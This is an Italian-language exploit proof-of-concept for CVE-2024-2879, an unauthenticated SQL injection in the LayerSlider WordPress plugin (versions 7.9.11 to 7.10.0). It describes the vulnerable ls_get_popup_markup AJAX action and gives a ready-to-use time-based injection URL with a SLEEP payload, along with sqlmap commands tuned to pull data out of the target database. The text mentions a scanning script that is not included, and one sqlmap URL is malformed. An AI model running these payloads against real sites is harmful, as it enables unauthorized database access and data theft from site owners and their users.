
Exploit proof-of-concept per CVE-2024-2879: SQL injection non autenticata nel plugin LayerSlider per WordPress (7.9.11-7.10.0). Include script di scansione e guida allo sfruttamento con SQLMap per estrarre informazioni dal database.
LayerSlider 7.9.11 - 7.10.0 - SQL Injection non autenticata
Il plugin LayerSlider per WordPress è vulnerabile a SQL Injection tramite l'azione ls_get_popup_markup nelle versioni 7.9.11 e 7.10.0 a causa di un escape insufficiente sul parametro fornito dall'utente e della mancanza di una preparazione adeguata sulla query SQL esistente. Ciò consente ad attaccanti non autenticati di aggiungere query SQL aggiuntive a query già esistenti che possono essere utilizzate per estrarre informazioni sensibili dal database.

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
Tempo di risposta con ritardo di 5 secondi

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
o
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T